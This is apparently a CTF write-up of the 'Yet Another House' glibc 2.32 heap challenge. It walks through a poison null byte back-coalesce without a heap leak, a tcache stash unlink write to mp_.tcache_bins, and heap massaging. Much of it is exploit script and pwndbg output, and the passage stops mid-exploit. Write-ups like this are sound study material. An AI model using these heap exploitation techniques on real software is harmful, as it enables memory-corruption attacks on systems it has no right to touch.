
Wednesday, December 30, 2020

Yet Another House ASIS Finals 2020 CTF Writeup

A few weeks ago, I played with DiceGang in ASIS Finals CTF. Yet Another House was one of the heap pwnables, and it had only one solve (which was by us). The general gist of it involved a glibc 2.32 poison null byte attack without a heap leak, a tcache stash unlink attack to overwrite mp_.tcache_bins, and a tcache poison for a controlled arbitrary write to escape seccomp for the flag. I didn't originally plan on making a writeup for this, but when redoing this complex pwnable a few weeks later, I thought it would be good to make some detailed notes so I don't forget these techniques.

Before I start, I would like to thank the teammates who worked with me on this: Poortho (who did the majority of the work and blooded it), NotDeGhost, Asphyxia, and noopnoop.

Initial Work:

One thing to note immediately is the patch the author introduced into the glibc library. 

He effectively disabled the possibility of attacking global_max_fast. 

Now, reversing this binary (all protections are enabled):

Inside initialize, a 0x20 chunk is allocated and the address of the tcache_perthread_struct is recorded. According to seccomp-tools, only open, read, write, mprotect, clock_nanosleep, rt_sigreturn, brk, exit, and exit_group were allowed. Also note that this program doesn't return, only uses read() and write(), and exits with _exit, which means our seccomp escape probably will not use FSOP. 

From the allocation function, we know that our requested sizes must be greater than 0x100 and less than or equal to 0x2000. We also have 0 to 18 slots inclusive (so 19 total). The read_data function (which I didn't show) null terminates. I would say that this function overall is safe. The malloc_wrapper function performs another important task:

Seems like it wipes the tcache_perthread_struct every time you call malloc :(

The delete function is safe and nulls out the size and chunk array indices respectively.

The leak function itself is also safe. I didn't show the code for write_1 here, but it only writes strlen(data) bytes, so if we want to use this for leaks, we have to be very careful not to introduce null bytes before the leaked value.

And here, we have a classic CTF heap note bug... the infamous poison null byte, as it writes a null byte one past the number of bytes read in. Note that this function can only be used once unless you reset the sanity value, but that wasn't necessary in this exploit.

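The last thing to take note of is that in this libc, the address stored in the unsorted bin's fd and bk pointers (main_arena+96) ends with a null byte, which will prove slightly troublesome later on: since that null is the low byte, it comes first in memory, so a strlen-based leak prints nothing.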
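To make the null byte problem concrete, here is a small Python model of a strlen-bounded leak. It assumes the leak behaves like write(1, buf, strlen(buf)) on a little-endian x86-64 qword; the two sample addresses are taken from the pwndbg output later in this post (main_arena+96 for the unsorted bin, main_arena+1728 for a largebin head).

```python
import struct

def strlen_leak(qword):
    """Bytes that write(1, buf, strlen(buf)) would emit if buf starts with this qword."""
    raw = struct.pack("<Q", qword)        # little-endian: the low byte comes first
    return raw.split(b"\x00", 1)[0]       # strlen stops at the first null byte

UNSORTED_HEAD = 0x7f23ee200c00   # main_arena+96: low byte is 0x00
LARGEBIN_HEAD = 0x7f23ee201260   # main_arena+1728: low byte is 0x60

print(strlen_leak(UNSORTED_HEAD))                               # b''
leaked = strlen_leak(LARGEBIN_HEAD)
print(hex(int.from_bytes(leaked.ljust(8, b"\x00"), "little")))  # 0x7f23ee201260
```

This is why the exploit later steers a largebin pointer, rather than the unsorted bin pointer, to the start of a chunk's data.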


From the reversing above, we can conclude several things and propose a basic exploit path.

Fastbins can just be ignored due to the allocation size ranges and the fact that we can't change global_max_fast due to the custom patch. 

Tcachebins (or at least the original ones that are placed within the 0x280 tcache_perthread_struct) can be used, as long as you do not allocate - this is a key concept! You can also use malloc() to wipe the struct as a way to help you during your heap massage (Ex. if you want to leave a permanent chunk in between two chunks that would otherwise coalesce).

By glibc 2.32, there are many more mitigations. As documented in my Player2 writeup, glibc introduced a mitigation against poison null byte where, before back coalescing, it checks that the size header of the chunk being coalesced onto matches the prev_size header. However, this time, we cannot easily forge headers via a heap leak to beat the unlink check like in Player2. Instead, we have to use the fact that glibc doesn't zero out the pointers for heap operations involving the unsorted and large bins (each uniquely sized chunk in a largebin has 2 sets of pointers, the second set being fd_nextsize and bk_nextsize, which maintain the sorted order). This technique has been documented in the following links (though some of them rely on the aid of fastbin pointers, which we do not have): BalsnCTF Plainnote writeup, poison null byte techniques, 2.29 off by null bypass (like many pwnable writeups, Chinese CTF players often document some of the coolest and most obscure techniques, but Google Translate should suffice).

An interesting thing to note is that in 2.32, the tcache_perthread_struct no longer stores tcache counts in a single byte; it now uses uint16_t. Hence, if we can place chunks of around size 0x1420 and up into the tcache, the memset will not be able to wipe their tcache count (or their pointer). Some of you may recall that the tcache count did not matter before, as long as you had a pointer in the tcache_perthread_struct (I believe those checks were once asserts in tcache_get that got compiled out for release builds), but now there are sanity checks against such behavior; this is why the chunks we want to reuse from the tcache must belong to a bin whose count is placed outside the memset range.
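The 0x1420 figure can be checked with a little arithmetic. This sketch assumes the x86-64 defaults (MINSIZE 0x20, MALLOC_ALIGNMENT 0x10, TCACHE_MAX_BINS 64) and that the challenge's memset clears exactly the 0x280-byte struct (64 uint16_t counts followed by 64 entry pointers). Offsets are relative to the start of tcache_perthread_struct; once mp_.tcache_bins is enlarged, indices of 64 and above simply run past the declared arrays.

```python
MINSIZE, MALLOC_ALIGNMENT = 0x20, 0x10      # x86-64 defaults
TCACHE_MAX_BINS = 64                        # compile-time size of both arrays
COUNTS_BYTES = 2 * TCACHE_MAX_BINS          # uint16_t counts[64]
WIPE = COUNTS_BYTES + 8 * TCACHE_MAX_BINS   # + tcache_entry *entries[64] == 0x280

def csize2tidx(csize):
    """glibc's csize2tidx for a chunk size (header included)."""
    return (csize - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT

def count_offset(csize):
    return 2 * csize2tidx(csize)                 # offset of counts[idx]

def entry_offset(csize):
    return COUNTS_BYTES + 8 * csize2tidx(csize)  # offset of entries[idx]

first_safe = next(s for s in range(MINSIZE, 0x2020, 0x10) if count_offset(s) >= WIPE)
print(hex(WIPE), hex(first_safe))                            # 0x280 0x1420
print(hex(count_offset(0x1510)), hex(entry_offset(0x1510)))  # 0x29e 0xaf8
```

The 0x1510 chunk size used later in the exploit therefore keeps both its count and its entry outside the wiped region.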

In order to expand the size of chunks we can place into the tcache, we can attack the malloc_par struct, with the symbol mp_ in libc. Take careful note of the tcache_bins member.

struct malloc_par
{
  /* Tunable parameters */
  unsigned long trim_threshold;
  INTERNAL_SIZE_T top_pad;
  INTERNAL_SIZE_T mmap_threshold;
  INTERNAL_SIZE_T arena_test;
  INTERNAL_SIZE_T arena_max;
  /* Memory map support */
  int n_mmaps;
  int n_mmaps_max;
  int max_n_mmaps;
  /* the mmap_threshold is dynamic, until the user sets
     it manually, at which point we need to disable any
     dynamic behavior. */
  int no_dyn_threshold;
  /* Statistics */
  INTERNAL_SIZE_T mmapped_mem;
  INTERNAL_SIZE_T max_mmapped_mem;
  /* First address handed out by MORECORE/sbrk.  */
  char *sbrk_base;
  /* Maximum number of buckets to use.  */
  size_t tcache_bins;
  size_t tcache_max_bytes;
  /* Maximum number of chunks in each bucket.  */
  size_t tcache_count;
  /* Maximum number of chunks to remove from the unsorted list, which
     aren't used to prefill the cache.  */
  size_t tcache_unsorted_limit;
};

By overwriting that with a large value (such as a libc address), we can place larger chunks into the tcache and thereby bypass the wipe.
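Since the stash write described below lands at bck + 0x10, it helps to know the exact offset of tcache_bins. This sketch mirrors the struct above with ctypes, assuming an LP64 x86-64 target where INTERNAL_SIZE_T, size_t, unsigned long, and pointers are all 8 bytes. The mp_ address is the one implied by the pwndbg output later in this post, which shows mp_+64 as 0x7f23ee2002c0.

```python
import ctypes

U64 = ctypes.c_uint64   # LP64 assumption: unsigned long, size_t, and pointers are 8 bytes

class MallocPar(ctypes.Structure):
    """Mirror of glibc 2.32's struct malloc_par on x86-64 (a sketch, not a glibc header)."""
    _fields_ = [
        ("trim_threshold", U64),
        ("top_pad", U64),
        ("mmap_threshold", U64),
        ("arena_test", U64),
        ("arena_max", U64),
        ("n_mmaps", ctypes.c_int),
        ("n_mmaps_max", ctypes.c_int),
        ("max_n_mmaps", ctypes.c_int),
        ("no_dyn_threshold", ctypes.c_int),
        ("mmapped_mem", U64),
        ("max_mmapped_mem", U64),
        ("sbrk_base", U64),            # char * in glibc
        ("tcache_bins", U64),
        ("tcache_max_bytes", U64),
        ("tcache_count", U64),
        ("tcache_unsorted_limit", U64),
    ]

TCACHE_BINS_OFF = MallocPar.tcache_bins.offset
MP_ = 0x7f23ee2002c0 - 64                   # pwndbg showed mp_+64 == 0x7f23ee2002c0
stash_bk = MP_ + TCACHE_BINS_OFF - 0x10     # bck such that bck->fd (at +0x10) is tcache_bins
print(hex(TCACHE_BINS_OFF), hex(stash_bk))  # 0x50 0x7f23ee2002c0
```

The resulting bk value matches the `mp_ + 80 - 0x10` used in the exploit and the BK that pwndbg reports for the corrupted 0x110 smallbin.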

Normally, this type of write makes me think of an unsorted bin or largebin attack. However, since 2.28, the unsorted bin attack has been patched with a bck->fd != victim check, and in 2.30 the largebin attack was hardened, though how2heap still shows a potential way to perform it (I took a closer look at the newer version of this attack after the CTF; although I did not test whether it would actually work in this challenge, it could have offered a much easier alternative with a simpler setup). Another way to achieve this write in glibc 2.32 is the tcache stashing unlink attack, which I learned from the following links: Heap Exploit v2.31, Tcache Stashing Unlink Attack.

The relevant source for this attack is here:

/* While we're here, if we see other chunks of the same size,
   stash them in the tcache.  */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
  {
    mchunkptr tc_victim;
    /* While bin not empty and tcache not full, copy chunks over.  */
    while (tcache->counts[tc_idx] < mp_.tcache_count
           && (tc_victim = last (bin)) != bin)
      {
        if (tc_victim != 0)
          {
            bck = tc_victim->bk;
            set_inuse_bit_at_offset (tc_victim, nb);
            if (av != &main_arena)
              set_non_main_arena (tc_victim);
            bin->bk = bck;
            bck->fd = bin;
            tcache_put (tc_victim, tc_idx);
          }
      }
  }

Basically, when chunks sit in a specific smallbin, making malloc pull from that smallbin also triggers a transfer of the remaining chunks into the corresponding tcache bin. Notice the bck = tc_victim->bk and bck->fd = bin statements in the stashing process: by corrupting the bk pointer of a smallbin chunk, we can write a libc address (the bin's own address) to a chosen address + 0x10. We must only do this when the tcache bin is one spot away from being full, so the stashing procedure ends immediately afterwards and avoids any further corruption. Most writeups start with 6 chunks in the tcache bin and 2 chunks in the smallbin, so one smallbin chunk is pulled out and the bk of the last one is corrupted (smallbins are FIFO structures with chunks removed from the tail); the stash is then triggered and ends immediately because the tcache bin becomes full. In this case, however, our tcache_perthread_struct always gets wiped, so we actually need 8 chunks in the smallbin: 1 to pull out, 6 to stash, and a final one to stash and write. Regardless of what happens, this smallbin will be corrupted and cannot be used again. If curious, readers can check out the stash unlink+ and stash unlink++ variants of this attack, which give an arbitrary address allocation, or an arbitrary address allocation plus a write of a libc address somewhere in memory.
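The 8-chunk requirement can be sanity-checked with a toy Python model of the smallbin path shown above. It is a simplification, not glibc code: memory is a dict of qwords, set_inuse_bit_at_offset and arena flags are ignored, the tcache count starts at 0 because of the wipe, and the chunk addresses are hypothetical. The bin and mp_ addresses come from the pwndbg output later in this post, where tcache_bins ends up as 139792295660800 (0x7f23ee200d00).

```python
FD, BK = 0x10, 0x18              # offsets of fd/bk inside a malloc_chunk (x86-64)
TCACHE_COUNT = 7                 # default mp_.tcache_count
BIN = 0x7f23ee200d00             # 0x110 smallbin head (main_arena+352) in the debug session
TARGET = 0x7f23ee2002d0          # &mp_.tcache_bins (mp_+80)

def link_smallbin(mem, chunks):
    """Link chunks into BIN; chunks[0] is the oldest, i.e. the tail malloc takes first."""
    ring = [BIN] + chunks[::-1]  # fd order: BIN -> newest -> ... -> oldest -> BIN
    for i, c in enumerate(ring):
        mem[c + FD] = ring[(i + 1) % len(ring)]
        mem[c + BK] = ring[i - 1]

def malloc_smallbin(mem):
    """Smallbin branch of _int_malloc plus the stash loop, with tcache counts wiped to 0."""
    victim = mem[BIN + BK]                 # last(bin)
    bck = mem[victim + BK]
    if mem[bck + FD] != victim:            # only the returned chunk is integrity-checked
        raise RuntimeError("malloc(): smallbin double linked list corrupted")
    mem[BIN + BK] = bck
    mem[bck + FD] = BIN
    count, stashed = 0, []
    while count < TCACHE_COUNT and mem[BIN + BK] != BIN:
        tc_victim = mem[BIN + BK]
        bck = mem[tc_victim + BK]          # attacker-controlled on the corrupted chunk
        mem[BIN + BK] = bck
        mem[bck + FD] = BIN                # the write primitive: *(bck + 0x10) = &bin
        stashed.append(tc_victim)
        count += 1                         # tcache_put increments the count
    return victim, stashed

mem = {}
chunks = [0x55e0675e5000 + i * 0x110 for i in range(8)]  # hypothetical chunk addresses
link_smallbin(mem, chunks)
mem[chunks[-1] + BK] = TARGET - 0x10                     # corrupt the newest chunk's bk
victim, stashed = malloc_smallbin(mem)
print(hex(victim), len(stashed), hex(mem[TARGET]))       # 0x55e0675e5000 7 0x7f23ee200d00
```

With one chunk fewer, the corrupted chunk would be stashed while the count is still below 7, and the loop would go on to dereference the fake bck.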

One more new protective feature in libc 2.32 is pointer obfuscation/safe linking, which I discussed previously in my CUCTF Dr. Xorisaurus writeup, where (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer) for singly linked lists. Once we achieve a heap leak, this protection mechanism is trivial to beat, and the new aligned address check for these lists won't matter as we will be targeting __free_hook.
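As a quick illustration of the formula, the helpers below implement the mangling and its inverse in Python. The sample values are the 0x110 tcache head and the mangled next pointer stored there, taken from the pwndbg output later in this post; the pointer decodes to index 4's chunk address from the chunk array dump.

```python
def protect_ptr(pos, ptr):
    """Safe-linking: pos is the address where the pointer is stored."""
    return (pos >> 12) ^ ptr

def reveal_ptr(pos, stored):
    """XOR with the same key undoes the mangling."""
    return (pos >> 12) ^ stored

head = 0x55e0675e3650           # tcache entry; its next field lives at this address
stored_next = 0x55e539584543    # mangled value pwndbg shows at that entry
print(hex(reveal_ptr(head, stored_next)))   # 0x55e0675e30a0
```

Because the key only depends on pos >> 12, a single heap leak is enough to forge pointers for any chunk in the same page range.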

Lastly, since this writeup requires a lot of heap massaging involving smallbins and largebins, I recommend reviewing this page from the Heap Book for all the conditions. It didn't turn out too bad when writing this exploit, as a lot of it just relied on some intuition and checking in a debugger.

Exploit Development:

I recommend following along closely with a debugger, as my explanations might sometimes be wrong, or I might have misexplained a small step due to the complexity of this exploit.

To start off, I wrote some helper functions:

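def wait():
    ...  # body not shown in the original
def alloc(size, data, line=True):
    assert(size > 0x100 and size <= 0x2000)
    if len(data) == size:
        line = False
    if line:
        ...  # rest of the helper not shown in the original
def free(idx):
    ...  # body not shown in the original
def leak(idx):
    ...  # body not shown in the original
def edit(idx, data, line=True):
    if line:
        ...  # rest of the helper not shown in the original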

Our first goal is to create a massive back coalesce with the poison null byte so we can perform overlaps. This part took quite a while, but Asphyxia ended up figuring this out late at night with the following general technique using largebins, unsorted bins, and normal back coalescing.

Several chunks are allocated, and then three chunks of different sizes (but belonging to the same largebin) are freed into the unsorted bin. A chunk larger than all three is then requested, causing a new chunk to be pulled from the wilderness and the 3 unsorted chunks to be sorted into that largebin in order, each with 2 sets of pointers filled because they all have unique sizes. Notice how the middle-sized one has its first set of pointers at an address ending in a null byte; this is on purpose, as we will later forge a fake size header over the first set of pointers here, and we can then realign dangling pointers in other chunks onto it with a partial overwrite of just the single null byte from the alloc function, which passes the unlink check.

alloc(0x438, 'A' * 0x438) # 0
alloc(0x448, 'B' * 8) # 1, leave fd_nextsize part be null if target to backward consolidate onto is of large size
alloc(0x108, 'test') # 2
alloc(0x438, 'C' * 0x438) # 3, smaller than B
alloc(0x108, 'test') # 4
alloc(0x418, 'D' * 0x418) # 5
alloc(0x458, 'E' * 0x458) # 6, bigger than B
alloc(0x108, 'test') # 7
alloc(0x500, 'test') # 1, trigger largebin allocation, because of different sizes, we'll have 2 sets of pointer in each chunk in largebin

all: 0x0
0x440: 0x55e0675e35c0 —▸ 0x55e0675e26f0 —▸ 0x55e0675e2c50 —▸ 0x7f23ee201000 (main_arena+1120) ◂— 0x55e0675e35c0

Note that I didn't fill the middle chunk with as many characters, since I will soon forge a fake chunk header there as the target to back coalesce onto. Because the back-coalesced region will be quite large, I have to leave the part after the pointers as null bytes (or at least the qword right after them), as glibc's unlink performs additional checks when the previous chunk is of large size and has a non-null fd_nextsize pointer.

Next, Asphyxia freed the chunk right before the middle largebin chunk, causing the two to coalesce (while leaving the 2 sets of pointers behind for me to use) and go into the unsorted bin. Another allocation is then made so that the first set of leftover pointers can be used to fake a chunk header, and the second set can help beat the unlink checks (I chose a fake chunk size of 0x2150).

free(0) # backwards consolidate to help us start forging size, this goes to unsorted now from largebin, also have largebin pointers now from the chunk it coalesced from
alloc(0x438 + 0x30, 'A' * 0x448 + p64(0x2151)[:-1]) # 0, to help forge chunk header

all: 0x55e0675e2720 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e2720
0x440: 0x55e0675e35c0 —▸ 0x55e0675e2c50 —▸ 0x7f23ee201000 (main_arena+1120) ◂— 0x55e0675e35c0
pwndbg> x/20gx 0x55e0675e2720-0x50
0x55e0675e26d0: 0x4141414141414141 0x4141414141414141
0x55e0675e26e0: 0x4141414141414141 0x4141414141414141
0x55e0675e26f0: 0x4141414141414141 0x4141414141414141
0x55e0675e2700: 0x4141414141414141 0x0000000000002151
0x55e0675e2710: 0x000055e0675e2c50 0x000055e0675e35c0
0x55e0675e2720: 0x0000000000000000 0x0000000000000421
0x55e0675e2730: 0x00007f23ee200c00 0x00007f23ee200c00
0x55e0675e2740: 0x0000000000000000 0x0000000000000000
0x55e0675e2750: 0x0000000000000000 0x0000000000000000
0x55e0675e2760: 0x0000000000000000 0x0000000000000000

Then, we cleared out the unsorted bin and recovered the other two largebin chunks, in order to build an unsorted chain. The order of frees now matters for the unsorted bin. We want the chunk underneath the fake header to sit in the middle of the chain, so that the pointers to it held by its neighbors can be redirected to the fake chunk with just a null byte overwrite (as they are all in the 0x......7XX range).

alloc(0x448-0x30, 'B' * (0x448-0x30)) # 3, clear our unsorted bin, also very important because this will be linked into the unsorted chain to help us with the dangling pointer partial overwrite
# 0, 1, 2, 3, 4, 5, 7
# now recover large bins and bring stuff back into unsorted
alloc(0x438, 'C' * 0x438) # 6
alloc(0x458, 'E' * 0x458) # 8
# 0, 1, 2, 3, 4, 5, 6, 7, 8
free(6) # unsorted chain

all: 0x55e0675e35c0 —▸ 0x55e0675e2720 —▸ 0x55e0675e2c50 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e35c0
pwndbg> x/4gx 0x55e0675e35c0
0x55e0675e35c0: 0x0044444444444444 0x0000000000000461
0x55e0675e35d0: 0x000055e0675e2720 0x00007f23ee200c00
pwndbg> x/4gx 0x55e0675e2720
0x55e0675e2720: 0x0000000000000000 0x0000000000000421
0x55e0675e2730: 0x000055e0675e2c50 0x000055e0675e35c0
pwndbg> x/4gx 0x55e0675e2c50
0x55e0675e2c50: 0x0000000000000000 0x0000000000000441
0x55e0675e2c60: 0x00007f23ee200c00 0x000055e0675e2720

Now we want to recover the 0x440 chunk from the unsorted bin and write a single null byte into its bk pointer to satisfy the fd->bk == P check. We want to do the same thing to the fd pointer of the 0x460 chunk (for the bk->fd == P check); in order to preserve its pointers, we back coalesce it with the chunk before it and allocate from the merged chunk instead. That allocation places a null byte that changes the 0x720 ending into a 0x700 ending, and the unlink check will be satisfied. Later on, when I trigger the malicious back coalesce, I will also get some heap pointers into these two chunks for a heap leak due to how unlink works. Notice how the forged chunk has the perfect pointer chain setup to pass the unlink check.

free(5) # coalesce in unsorted to get leftover pointers
# 0, 1, 2, 4, 7
# with unlink, 3 and end of 5 will be getting heap pointers (but 5 will have nulls in front because of forged size metadata)
alloc(0x438, 'C' * 8) # 3, fix the fd pointer, pulling back from unsorted
alloc(0x418 + 0x20, 'D' * (0x418) + p64(0x461)) # 5, fix the bk pointer, pulling from the one I coalesced, sorts an unsorted chunk to largebin
# 0, 1, 2, 3, 4, 5, 7
log.info("finished heap massage")

pwndbg> x/4gx 0x55e0675e2700
0x55e0675e2700: 0x4141414141414141 0x0000000000002151
0x55e0675e2710: 0x000055e0675e2c50 0x000055e0675e35c0
pwndbg> x/4gx 0x000055e0675e2c50
0x55e0675e2c50: 0x0000000000000000 0x0000000000000441
0x55e0675e2c60: 0x4343434343434343 0x000055e0675e2700
pwndbg> x/4gx 0x000055e0675e35c0
0x55e0675e35c0: 0x4444444444444444 0x0000000000000461
0x55e0675e35d0: 0x000055e0675e2700 0x00007f23ee200c00
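The checks the forged chunk has to survive can be replayed in a small Python model. This is a simplified mirror of glibc 2.32's unlink_chunk checks (the size vs. prev_size comparison and the fd/bk consistency check), not glibc itself. The qwords come from the dumps above; the prev_size at P + 0x2150 is the value that the later edit(9, ...) overflow writes, so the model shows the state at the moment free(10) runs.

```python
P = 0x55e0675e2700                       # forged chunk header
FD_CHUNK, BK_CHUNK = 0x55e0675e2c50, 0x55e0675e35c0

mem = {
    P + 0x08: 0x2151,                    # fake size: 0x2150 | PREV_INUSE
    P + 0x10: FD_CHUNK,                  # fake fd (old fd_nextsize)
    P + 0x18: BK_CHUNK,                  # fake bk (old bk_nextsize)
    P + 0x20: 0x0,                       # fake fd_nextsize, left null on purpose
    P + 0x2150: 0x2150,                  # index 10's prev_size, written by edit(9, ...)
    FD_CHUNK + 0x18: P,                  # fd->bk after the 'C' * 8 null byte
    BK_CHUNK + 0x10: P,                  # bk->fd after the 'D' * 0x418 null byte
}

def unlink_chunk(mem, p):
    """Simplified replay of the consolidation checks; returns True if the
    large-chunk nextsize checks would also run."""
    size = mem[p + 0x08] & ~0x7
    if size != mem[p + size]:            # chunksize(p) != prev_size(next_chunk(p))
        raise RuntimeError("corrupted size vs. prev_size")
    fd, bk = mem[p + 0x10], mem[p + 0x18]
    if mem[fd + 0x18] != p or mem[bk + 0x10] != p:
        raise RuntimeError("corrupted double-linked list")
    mem[fd + 0x18] = bk                  # fd->bk = bk
    mem[bk + 0x10] = fd                  # bk->fd = fd
    return size >= 0x400 and mem[p + 0x20] != 0   # 0x400: first non-smallbin size

needs_nextsize_checks = unlink_chunk(mem, P)
heap_leak = mem[FD_CHUNK + 0x18]         # index 3's data + 8 now holds a heap pointer
print(needs_nextsize_checks, hex(heap_leak - 0x15c0))   # False 0x55e0675e2000
```

The unlink writes are also where the heap leak comes from: index 3's data starts with 'C' * 8 followed by the freshly written 0x...35c0 pointer, which is exactly what the exploit later reads with `p.recv(14)[8:]` before subtracting 0x15c0.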

Afterwards, I cleaned up the remaining largebin and unsorted bin chunks, and performed a few more allocations just to expand the number of chunks that would be overlapped. I then allocated a few more chunks of size 0x110 (which I will use later for the tcache stash unlink attack), with some additional fake chunk metadata to allow me to free a fake 0x1510 chunk later, which I plan to use for the tcache poison attack. My final 0x110 chunk only serves to prevent consolidation later, depending on the order in which I build my smallbin chain, and I cannot use it, as this extra spot is crucial for the later massage.

I triggered the poison null byte after setting the correct prev_size metadata, and after freeing the poisoned chunk I had a massive unsorted chunk that overlapped a lot of memory.

# at this point we have an unsorted and largebin, let's clean up the unsorted and largebin
alloc(0x430, 'test') # 6
alloc(0x410, 'test') # 8
alloc(0x808, 'G' * 0x808) # 9
alloc(0x4f8, 'H' * 0x4f8) # 10
alloc(0x468, 'temp') # 11
# for stashing into tcache (since tcache won't get wiped unless we call malloc in this program)
alloc(0x108, 'stash') # 12
alloc(0x108, 'stash') # 13
alloc(0x108, 'stash') # 14
alloc(0x108, 'stash' + '\x00' * 3 + p64(0) + (p64(0) + p64(0x21)) * 13) # 15, for the later 0x1510 fake chunk that i will free to tcache poison
alloc(0x108, 'stash') # 16
alloc(0x108, 'stash') # 17
alloc(0x108, 'temp') # 18, so no back coalescing later when we send 17 to unsorted
edit(9, (p64(0) + p64(0x21)) * (0x800 / 16) + p64(0x2150), line=False)
# back coalesce
free(10)
log.info("achieved backwards coalesce")

all: 0x55e0675e2700 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e2700
pwndbg> x/4gx 0x55e0675e2700
0x55e0675e2700: 0x4141414141414141 0x0000000000002651
0x55e0675e2710: 0x00007f23ee200c00 0x00007f23ee200c00

Now chunk 3 will have heap pointers. Chunk 5 also does, but my forged size metadata comes before it so you won't be able to leak it from there.
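The 0x2651 size in that dump follows from simple arithmetic. This sketch uses the addresses above, with index 9's user pointer 0x55e0675e4050 taken from the chunk array listing further down; it assumes no forward coalescing takes place because index 11 is still in use.

```python
FAKE_CHUNK = 0x55e0675e2700        # forged header (size 0x2151)
IDX9_HDR = 0x55e0675e4050 - 0x10   # index 9's user pointer minus the chunk header
IDX9_SIZE = 0x810                  # alloc(0x808) -> 0x810 chunk
FAKE_SIZE = 0x2150                 # forged size, also written as index 10's prev_size
IDX10_SIZE = 0x500                 # alloc(0x4f8) -> 0x501, PREV_INUSE cleared by the null byte
PREV_INUSE = 0x1

idx10_hdr = IDX9_HDR + IDX9_SIZE           # index 10 starts right after index 9
prev_chunk = idx10_hdr - FAKE_SIZE         # where free(10) looks for the previous chunk
merged = (FAKE_SIZE + IDX10_SIZE) | PREV_INUSE
print(hex(idx10_hdr), hex(prev_chunk), hex(merged))  # 0x55e0675e4850 0x55e0675e2700 0x2651
```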

Here, some serious heap massaging begins. During the CTF, Poortho managed to massage it cleanly in 2-3 hours (basically carrying us to the first blood); I remember his exploit having several dangling unsorted and small chains around so it is quite impressive that he managed to keep the heap stable. It took me much longer to massage the heap, and I had to keep it as clean as possible to avoid breaking it.

Since the libc address of the unsorted bin has a null low byte, I had to find a way to get a largebin pointer placed at the beginning of one of my chunks' data for a libc leak. I achieved this by first aligning the unsorted chunk with one of my chunk data addresses, then allocating a very large chunk (bigger than the unsorted chunk) to trigger largebin sorting, which gave me a libc leak. Two operations were also performed to fix some chunks' size metadata that got corrupted and overwritten during these heap manipulations (though they turned out to be unnecessary, as I had to change all of them in the next stage of the exploit). Lastly, I allocated another 0x110 chunk into index 10, and used that as an opportunity to fix index 8's chunk size to something valid that works nicely with free().

# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17
# everything from 0 - 9 is overlapped
heapbase = u64(p.recv(14)[8:].ljust(8, '\x00')) - 0x15c0
log.info('heap base: 0x%x' % heapbase)
# libc 2.32 has null ending for main arena + 96 libc address
alloc(0xa90, p64(0) * 3 + p64(0x421)) # 10, should align right over index 5, fix size of index 8
alloc(0x2000, 'test') # 18 send unsorted chunk into largebin, get largebin pointers into index 5
libcleak = u64(p.recv(6).ljust(8, '\x00'))
libc.address = libcleak - 0x1bf270
log.info('libc base: 0x%x' % libc.address)
free(10) # go back up
# fixing index 5 size
alloc(0x670, 'test') # 10
alloc(0x430, (p64(0) + p64(0x21)) * (0x410 / 16) + p64(0) + p64(0x441)) # 18
# recoalesce it up
alloc(0x108, p64(0) * 2 + (p64(0) + p64(0x21))*5) # 10, fix size of index 8

A general technique I used above, and one that I will use from now on to fake sizes or forge metadata, is to allocate one or two massive chunks from the unsorted bin to reach the target destination, write the data upon allocation, and then free them in the reverse order of allocation so that they back coalesce and restore the state of the unsorted bin.

In order to perform a tcache stash attack in a scenario where the tcache_perthread_struct gets wiped on each malloc(), we need 15 0x110 chunks to free. The first 7 can be freed into the tcache, and the next 8 will be freed into the unsorted bin (where we have to be very careful to avoid chunk coalescing). From there, we can trigger malloc to move all of them into the smallbin, making sure the chunk inserted last into the 0x110 smallbin is overlapped so its bk pointer can be tampered with; this way we can still perform the stash attack without crashing and have the final chunk entering the tcache perform the write. At the current stage, we only have 0x110 chunks at indices 12, 13, 14, 15, 16, 17, 2, 4, 7, and 10, so we will need 5 more. Here is the program's chunk array as of now:

0x55e06625f520: 0x000055e0675e22c0 0x000055e0675e3b40 S
0x55e06625f530: 0x000055e0675e2b50 X 0x000055e0675e2c60
0x55e06625f540: 0x000055e0675e30a0 X 0x000055e0675e31b0
0x55e06625f550: 0x000055e0675e35f0 S 0x000055e0675e3a30 X
0x55e06625f560: 0x000055e0675e2730 0x000055e0675e4050 S
0x55e06625f570: 0x000055e0675e2710 X 0x000055e0675e4d60
0x55e06625f580: 0x000055e0675e51d0 X 0x000055e0675e52e0 X
0x55e06625f590: 0x000055e0675e53f0 X 0x000055e0675e5500 X
0x55e06625f5a0: 0x000055e0675e5610 X 0x000055e0675e5720 X
0x55e06625f5b0: 0x0000000000000000

The ones marked with X are the 0x110 chunks (or at least should have that as the size and I have to repair them later). The ones marked with S are towards the end of the unsorted overlap, and hence I would like to save them for the overlap writes later. I plan on saving one for the tcache poison, one for the smallbin bk pointer corruption, and just one extra for backup/padding purposes (in the end, I didn't even need it); these were index 1, 6, and 9. 

To free up the other chunks, I performed the technique mentioned above (allocate one to two chunks, write the correct size or just spam with 0x21 sizes, and recoalesce back to restore unsorted chunk) on chunks 3 and 5 to make them isolated 0x20 sized chunks (size for index 8 has already been changed in the last 0x110 allocation), on chunk 9 to make it into size 0x1510, and applied it one last time to fix some of the 0x110 chunk size metadata that I may have overwritten. Chunk 11 can be freed before all of these operations by just having it back coalesce into the large unsorted bin. I will also free 0, which will add one more unsorted chunk into the unsorted bin, but luckily it didn't raise any new issues I had to deal with in the heap massage later. We should have 6 free spots at this point; 5 for additional 0x110 chunks and one for padding/alignment purposes to create an overlap.

# coalesce 11 into big unsorted
# fix index 3, remember to fix the 0x111 metadata issue (for 2, 4, 7), but we can repair this later
alloc(0x480, (p64(0) + p64(0x21)) * (0x430 / 16) + (p64(0) + p64(0x21)) * 5) # 11
# fix index 5
alloc(0x900, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * (0x80 / 2) + (p64(0) + p64(0x21)) * 10) # 11
# free index 8 now too, could have been done earlier
# fix index 9 to size metadata 0x1511 for potential tcache poison
alloc(0x17f0, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * 2 + p64(0) + p64(0x1511)) # 5, around size 0x1420~0x1430ish to escape the memset on tcache_perthread_struct
# repair the 0x111 size for 2, 4, 7 (7 is still clean, so it's good) note how among 1, 6, 9, only 6 is before one of the 0x110 chunks? use 6 for the bk overwrite
